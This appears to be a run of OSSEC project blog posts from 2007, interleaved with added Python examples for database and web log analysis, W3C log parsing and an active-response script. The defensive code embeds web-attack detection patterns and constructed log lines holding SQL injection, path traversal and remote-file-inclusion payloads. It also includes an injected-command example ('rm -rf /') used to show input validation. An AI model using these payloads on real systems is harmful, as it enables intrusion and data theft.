OSSEC at IT Underground 2007

OSSEC will be represented at the 2007 IT Underground Conference in Warsaw (Poland), where I will be speaking about Log-Based Intrusion Detection (using OSSEC, of course). It is going to be a hands-on, one-hour presentation where everyone is invited to bring their own laptop and actively participate. If you live in Poland (or nearby), make sure to attend to learn more about LIDS, OSSEC and log analysis.

Database Logging

The next version of OSSEC will come with support for PostgreSQL logs and MySQL error/query logs. Since database logging is not widely done (and documentation about it is hard to find), I started some sections about it in the OSSEC wiki. If you are interested in database log analysis, please check out the following pages and help us improve them:

If you have information about logging on other databases (Oracle, MS SQL, etc.), send it to us so we can add support for them in OSSEC.

*This alpha snapshot of 1.4 has database support enabled, for anyone interested in testing it: http://www.ossec.net/files/snapshots/ossec-hids-070930.tar.gz
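To give an idea of what database log analysis looks like in practice, here is an added example (my own illustration, not OSSEC's decoders or rules): it decodes PostgreSQL lines forwarded through syslog and classic MySQL error-log lines into one event shape, and then applies a frequency rule to repeated authentication failures from a single source. The line layouts are assumptions about one common configuration (PostgreSQL with log_connections on, MySQL with warnings logged), and the sample lines are constructed, not real traffic. PostgreSQL only names the client address in the FATAL line if log_line_prefix includes it, so the example recovers the address from the earlier "connection received" line of the same backend pid.

```python
"""Decode PostgreSQL and MySQL log lines and alert on repeated
authentication failures from one source (an OSSEC-style frequency rule).
Added example, not OSSEC code; the line layouts are assumptions."""
import re
from collections import Counter, defaultdict

# Assumption: PostgreSQL via syslog with log_connections=on, e.g.
# "Sep 30 12:00:01 db1 postgres[4321]: [2-1] LOG:  connection received: host=10.0.0.5 port=51234"
PG_LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) postgres\[(?P<pid>\d+)\]: "
    r"(?:\[\d+-\d+\] )?(?P<level>LOG|WARNING|ERROR|FATAL|PANIC):\s+(?P<msg>.*)$"
)
# Assumption: classic MySQL error log, e.g.
# "070930 12:00:03 [Warning] Access denied for user 'root'@'192.0.2.7' (using password: YES)"
MY_LINE = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d\d:\d\d) \[(?P<level>Note|Warning|ERROR)\] (?P<msg>.*)$"
)
PG_CONN = re.compile(r"connection received: host=(?P<ip>\S+) port=\d+")
PG_FAIL = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
MY_FAIL = re.compile(r"Access denied for user '(?P<user>[^']*)'@'(?P<ip>[^']+)'")


def decode(line):
    """Turn one raw line into a flat event dict, or None if it is neither format."""
    m = PG_LINE.match(line)
    if m:
        return dict(program="postgresql", **m.groupdict())
    m = MY_LINE.match(line)
    if m:
        return dict(program="mysql", pid=None, **m.groupdict())
    return None


def failed_logins(lines):
    """Yield (program, user, srcip) for every failed authentication.

    PostgreSQL does not put the client address in the FATAL line unless
    log_line_prefix includes %h/%r, so the address is taken from the
    earlier 'connection received' LOG line of the same backend pid.
    """
    pid_to_ip = {}
    for line in lines:
        ev = decode(line)
        if ev is None:
            continue
        if ev["program"] == "postgresql":
            c = PG_CONN.search(ev["msg"])
            if c:
                pid_to_ip[ev["pid"]] = c.group("ip")
                continue
            f = PG_FAIL.search(ev["msg"])
            if f:
                yield ("postgresql", f.group("user"), pid_to_ip.get(ev["pid"], "unknown"))
        else:
            f = MY_FAIL.search(ev["msg"])
            if f:
                yield ("mysql", f.group("user"), f.group("ip"))


def brute_force_alerts(lines, threshold=3):
    """Count failures per source IP across both databases and report the
    sources that reach the threshold, most active first."""
    per_ip = Counter()
    users = defaultdict(set)
    for program, user, ip in failed_logins(lines):
        per_ip[ip] += 1
        users[ip].add(f"{program}:{user}")
    return [
        {"srcip": ip, "count": n, "targets": sorted(users[ip])}
        for ip, n in per_ip.most_common()
        if n >= threshold
    ]


# Constructed sample input; not real traffic.
SAMPLE = """\
Sep 30 12:00:01 db1 postgres[4321]: [1-1] LOG:  connection received: host=10.0.0.5 port=51234
Sep 30 12:00:01 db1 postgres[4321]: [2-1] FATAL:  password authentication failed for user "app"
Sep 30 12:00:02 db1 postgres[4322]: [1-1] LOG:  connection received: host=10.0.0.5 port=51235
Sep 30 12:00:02 db1 postgres[4322]: [2-1] FATAL:  password authentication failed for user "app"
Sep 30 12:00:05 db1 postgres[4323]: [1-1] LOG:  connection received: host=10.0.0.8 port=51300
Sep 30 12:00:05 db1 postgres[4323]: [2-1] LOG:  connection authorized: user=app database=shop
070930 12:00:03 [Warning] Access denied for user 'root'@'192.0.2.7' (using password: YES)
070930 12:00:04 [Warning] Access denied for user 'root'@'192.0.2.7' (using password: YES)
070930 12:00:04 [Note] /usr/sbin/mysqld: ready for connections.
070930 12:00:06 [Warning] Access denied for user 'admin'@'192.0.2.7' (using password: NO)
""".splitlines()

if __name__ == "__main__":
    for alert in brute_force_alerts(SAMPLE):
        print(alert)
```

With the default threshold of three, only 192.0.2.7 (three MySQL failures against two accounts) is reported; the two PostgreSQL failures from 10.0.0.5 stay below it, which is exactly the kind of tuning decision a frequency rule forces you to make.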

Chinese hacking and disinformation warfare

For the last few weeks many articles and news stories have been published about Chinese hacking of US government computers. The reality is that the Chinese have been hacking US, Russian, Australian (etc.) computers for years, but they are not the only ones to blame, since the US, Russia and every other country have been doing the same for a long time.

Why is this news now? Richard Bejtlich pointed out that it might be for political reasons, but why would a country let the enemy know that they succeeded? Even worse, why would the US Air Force publish on their own site that the Chinese are the leader in cyber warfare?

That might be the reason. One of the things I learned from history is that governments use “disinformation warfare” to achieve their goals. My take is that the US government (and intelligence agencies) set up some honeypots with fake information for the Chinese to hack. The Chinese were successful, and now the US government wants the Chinese to believe that they hacked real information. What is the best way to make them believe so? Yes, tell the whole world about it.

*Yes, this is not news anymore, but I am still catching up on my reading.
**Sorry for the off-topic post; back to OSSEC from now on 🙂

How to create a log standard

  1. Get the marketing team together for a clever name.
  2. Copy and paste Microsoft’s IIS W3C log format.
  3. Write a press release and tell the world about it.

I am not joking: eIQnetworks released their Open Source Event Logging Standard, and it fits my description above exactly. First, they call it “Open Source”. Do they know what open source means? Which OSI-approved license did they use? Second, why require a registration to download it? What are they going to do with the information provided? Is it open or not? Lastly, their format is an ugly copy and paste of the Microsoft one. Look at their proposed header:

#Software: eIQ Open Log Format (OLF)
#Version: 1.1
#Date: 02-18-2007 12:14:25 300
#Fields: date time gmt-offset internalIP externalIP virtualdevice..

Look at Microsoft’s:

#Software: Microsoft Internet Information Services 5.1
#Version: 1.0
#Date: 2006-10-09 02:11:51
#Fields: date time c-ip cs-username s-sitename s-computername

I will refrain from commenting further, but you can take a look at it yourself: Open Log Format.
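The headers above tell the whole story: both are W3C Extended Log Format, so one parser reads both. As an added example (my own code, not eIQ's or Microsoft's), here is a small parser driven by the `#Fields:` directive, run over the two headers quoted above with constructed data rows. The OLF field list is cut down to the names visible in the post and the `"fw core"` value is made up to show quoted strings; `-` is the format's marker for an empty value.

```python
"""Parse W3C Extended Log Format (IIS) and, because it is the same layout,
eIQ's OLF: '#' directives, a '#Fields:' line naming the columns, '-' for
empty values.  Added example, not vendor code; the data rows are constructed."""
import re

TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(line):
    """Split a data row on whitespace, keeping quoted strings intact."""
    return [t[1:-1] if t.startswith('"') and t.endswith('"') else t
            for t in TOKEN.findall(line)]


def parse_elf(text):
    """Return (directives, records).

    directives: dict of the last value seen for each '#Name:' line.
    records: one dict per data row, keyed by the names in the most recent
    '#Fields:' directive; '-' becomes None.  A new '#Fields:' line (IIS
    writes one per log restart) re-keys the rows that follow it.
    """
    directives, records, fields = {}, [], None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            name, _, value = line[1:].partition(":")
            value = value.strip()
            directives[name] = value
            if name == "Fields":
                fields = value.split()
            continue
        if fields is None:
            raise ValueError(f"line {lineno}: data before any #Fields directive")
        values = tokenize(line)
        if len(values) != len(fields):
            raise ValueError(
                f"line {lineno}: expected {len(fields)} fields, got {len(values)}")
        records.append({k: (None if v == "-" else v) for k, v in zip(fields, values)})
    return directives, records


# Constructed samples: the headers are the ones quoted in the post, the rows are made up.
IIS_SAMPLE = """\
#Software: Microsoft Internet Information Services 5.1
#Version: 1.0
#Date: 2006-10-09 02:11:51
#Fields: date time c-ip cs-username s-sitename s-computername
2006-10-09 02:11:51 192.0.2.10 - W3SVC1 WEBSRV01
2006-10-09 02:11:52 192.0.2.11 alice W3SVC1 WEBSRV01
"""

OLF_SAMPLE = """\
#Software: eIQ Open Log Format (OLF)
#Version: 1.1
#Date: 02-18-2007 12:14:25 300
#Fields: date time gmt-offset internalIP externalIP virtualdevice
02-18-2007 12:14:25 300 10.1.1.5 198.51.100.9 "fw core"
"""

if __name__ == "__main__":
    for sample in (IIS_SAMPLE, OLF_SAMPLE):
        directives, records = parse_elf(sample)
        print(directives["Software"], records)
```

Note that the field-count check is what keeps a truncated or tampered row from silently shifting every later column; that is the check most quick-and-dirty W3C log readers forget.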

Update 1: Anton Chuvakin and Raffael Marty reviewed their “standard”: chuvakin.blogspot and raffy.ch.

Web attacks resource

I have a few honeypots out there just collecting information about web attacks, and they have been a great help in improving OSSEC and how it parses web/proxy logs. Since I couldn’t find any public resource dedicated to storing this kind of information, I decided to create one at the OSSEC wiki to keep track of it. It is all manual right now, but I plan to automate much of the work to keep the page current.

I have a few entries with sites storing php/perl bots, common attack patterns, copies of the tools used, etc. If you want to help keep it updated, let me know. If you want to share your logs (from real servers or honeypots), that would be great too.

More info: Web attacks links
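For anyone who wants to pull the same kind of patterns out of their own access logs before sharing them, here is an added example (my own code, not OSSEC's web rules): it parses Apache combined-format lines, percent-decodes the request twice because the bots double-encode, and tags each request with the attack families the honeypots see most (remote file inclusion, SQL injection, path traversal, and probing for common admin scripts), then tallies them per source. The sample lines are constructed, with documentation-range addresses, and the signature list is deliberately short; treat it as a starting point rather than a ruleset.

```python
"""Classify requests in Apache combined-format access logs into the attack
families a PHP/Perl bot honeypot sees most and count them per source.
Added example, not OSSEC's web rules; sample lines are constructed."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each pattern is evaluated on the decoded, lower-cased request URL.
SIGNATURES = [
    ("rfi", re.compile(r"[?&][^=]+=(?:https?|ftp)://")),  # page=http://host/bot.txt?
    ("sqli", re.compile(r"union(?:\s|/\*.*?\*/)+select|'\s*or\s+'?\d+'?\s*=\s*'?\d+|;\s*drop\s+table")),
    ("traversal", re.compile(r"(?:\.\./|\.\.\\){2,}|/etc/passwd")),
    ("probe", re.compile(r"/(?:phpmyadmin|pma|myadmin)/|/xmlrpc\.php")),
]


def decode_request(url):
    """Percent-decode twice (bots double-encode) and lower-case for matching."""
    return unquote_plus(unquote_plus(url)).lower()


def classify(line):
    """Return (event, tags) or None if the line is not combined format.
    tags is the list of matching attack families, often empty."""
    m = COMBINED.match(line)
    if not m:
        return None
    ev = m.groupdict()
    req = decode_request(ev["url"])
    tags = [name for name, rx in SIGNATURES if rx.search(req)]
    return ev, tags


def summarize(lines):
    """Per-source tally of attack families; sources with no hits are omitted."""
    hits = defaultdict(Counter)
    for line in lines:
        result = classify(line)
        if result is None:
            continue
        ev, tags = result
        for tag in tags:
            hits[ev["ip"]][tag] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}


# Constructed sample lines; addresses are from the documentation ranges.
SAMPLE = """\
203.0.113.4 - - [30/Sep/2007:12:00:01 +0000] "GET /index.php?page=http://203.0.113.99/bot.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.4 - - [30/Sep/2007:12:00:02 +0000] "GET /admin.php?id=1%27%20UNION%20SELECT%20user%2Cpass%20FROM%20users HTTP/1.1" 500 0 "-" "libwww-perl/5.805"
198.51.100.7 - - [30/Sep/2007:12:00:03 +0000] "GET /cgi-bin/view.cgi?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 404 210 "-" "Mozilla/4.0"
198.51.100.7 - - [30/Sep/2007:12:00:04 +0000] "GET /phpMyAdmin/main.php HTTP/1.0" 404 210 "-" "Mozilla/4.0"
192.0.2.20 - - [30/Sep/2007:12:00:05 +0000] "GET /about.html HTTP/1.1" 200 1832 "http://example.org/" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, families in summarize(SAMPLE).items():
        print(ip, families)
```

Decoding before matching matters more than the signatures themselves: the SQL injection line above never contains the literal text "union select" on disk, only its percent-encoded form, and a rule that matches the raw log line misses it.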

OSSEC at the “Own the Box” competition

Paul Ziegler (tatsumori) sent me a very interesting e-mail explaining how he used OSSEC to protect his box at Defcon 15’s “Øwn the box” competition.

During Defcon15 there was a new kind of contest called the “Øwn the box” competition where anyone who 0wned a box got to take it home. I was over there as a speaker so I thought it might be fun to try defending a box. My box was based on Gentoo-Linux and hardened using various techniques…

So the results were recently published on the DC-Homepage (http://defcon.org/) – and if you look closely there is this line saying “Most evil entry: Tatsumori (Gentoo Hardened with arp poisoning evilness)” The arp-foo was actually done using scapy, but I scripted it as an active response for OSSEC 1.2. So part of my success to survive there (and really make people curse out while hacking) is OSSEC.

Its great modularity and easy extensibility make creating kick-ass crazy dedicated solutions so much easier than it ever was before.

He also posted some information on his blog. Very cool stuff, Paul!
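Since Paul's trick was "just" a custom active response, here is an added example of the contract such a script has to honour (my own skeleton, not Paul's scapy script, whose ARP part is not reproduced here). The positional arguments follow the ones the scripts shipped with OSSEC (host-deny.sh and friends) read: action, user, source IP, alert id, rule id. The one point worth copying is the validation: the source IP is lifted straight out of a log line the attacker wrote, so it is checked as an IP literal and handed to the command as an argv list, never interpolated into a shell string. The iptables action and the log path are assumptions standing in for whatever response you actually want.

```python
"""Skeleton of a custom OSSEC active-response script.  Added example; the
argument order (action user srcip alertid ruleid) matches the scripts OSSEC
ships.  The firewall drop is a placeholder action; swap in your own."""
import ipaddress
import sys
import time

LOG = "/var/ossec/logs/active-responses.log"  # assumed default install path


def safe_source(srcip):
    """True only for a parseable, non-local IP literal.

    srcip comes from a log line the attacker controlled, so anything that is
    not a plain address ("1.2.3.4; rm -rf /", hostnames, empty) is rejected.
    """
    try:
        ip = ipaddress.ip_address(srcip)
    except ValueError:
        return False
    return not (ip.is_loopback or ip.is_unspecified)


def parse_args(argv):
    """Validate OSSEC's positional arguments and return them as a tuple."""
    if len(argv) < 6:
        raise ValueError("usage: script add|delete user srcip alertid ruleid")
    action, user, srcip, alertid, ruleid = argv[1:6]
    if action not in ("add", "delete"):
        raise ValueError(f"unknown action {action!r}")
    if not safe_source(srcip):
        raise ValueError(f"refusing to act on source {srcip!r}")
    return action, user, str(ipaddress.ip_address(srcip)), alertid, ruleid


def build_command(action, srcip):
    """Return the argv for the response; 'delete' undoes 'add' (OSSEC sends
    it itself when the response timeout expires).  Never a shell string."""
    flag = "-I" if action == "add" else "-D"
    return ["iptables", flag, "INPUT", "-s", srcip, "-j", "DROP"]


def run(argv, execute=False, logfile=LOG):
    """Parse, log, and (when execute is set) run the response.
    Returns the argv that was or would be executed."""
    action, user, srcip, alertid, ruleid = parse_args(argv)
    cmd = build_command(action, srcip)
    if execute:
        import subprocess
        with open(logfile, "a") as fh:
            fh.write(f"{time.ctime()} {argv[0]}: {action} {user} {srcip} {alertid} {ruleid}\n")
        subprocess.run(cmd, check=True)
    return cmd


if __name__ == "__main__":
    run(sys.argv, execute=True)
```

Keep in mind that OSSEC also calls the script with "delete" after the configured timeout, so the response has to be reversible and idempotent; a script that only knows "add" leaves the box in whatever state the last alert put it in.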

Bruce Schneier on log analysis

We all respect Bruce Schneier’s opinion (if you don’t, be careful), and I found his take on log analysis very interesting:

Whenever someone attacks you, they leave footprints… All of these products have audit logs and they produce audit messages (millions of messages a day). Most of them are a complete waste of time, like “printer out of toner”. So what?

But some of them are very important. In those audit logs are the footprints of attacks. If you can monitor those in real time, you can watch the attacker as he is attacking. If you can understand what is going on fast enough, you can kick him out before he does more damage…

You can watch it here.

Cool OSSEC logo/mascot

James Throgmorton sent me a very cool mascot that he made for OSSEC. It is based on the movie 300 and looks pretty good.

OSSEC - 300

I was also playing with IMG2TXT, and it generates some very good ASCII-based logos for OSSEC. Check out one example here.

On a side note, RichM from Ethical Hacker posted a “Quick and dirty tutorial on getting OSSEC, the open source IDS that’s #2 on insecure.org, running on the Business Card ISO of Debian. Now go out there and start keeping an eye on your network.” Good stuff!

OSSEC v1.3 released

We are pleased to announce the general availability of OSSEC version 1.3. This is one of our biggest releases so far, and our first under the GPLv3, with numerous new features and bug fixes.

This new version comes with the following major new features:

  • User interface to manage the Windows agent. Screenshots here.
  • Support for Courier pop3/imapd logs. Samples here.
  • Support for Cisco IOS logs.
  • Support for Symantec Web Security logs.
  • Support for SMF-SAV Sendmail filter logs.
  • Chinese Translation of the installation script.
  • Support for host-based policy monitoring/enforcement on Windows systems. More information here.

Check the v1.3 changelog for all changes and contributors.

Special thanks to Michael Starks, Brian Wang, Serge Dubrouski, Logan O’Sullivan Bruns and Dave Lowe for the contributions and Dennis Borkhus-Veto, John Ives and Liliane Cid for beta testing this release.

Download it here.

Official announcement here.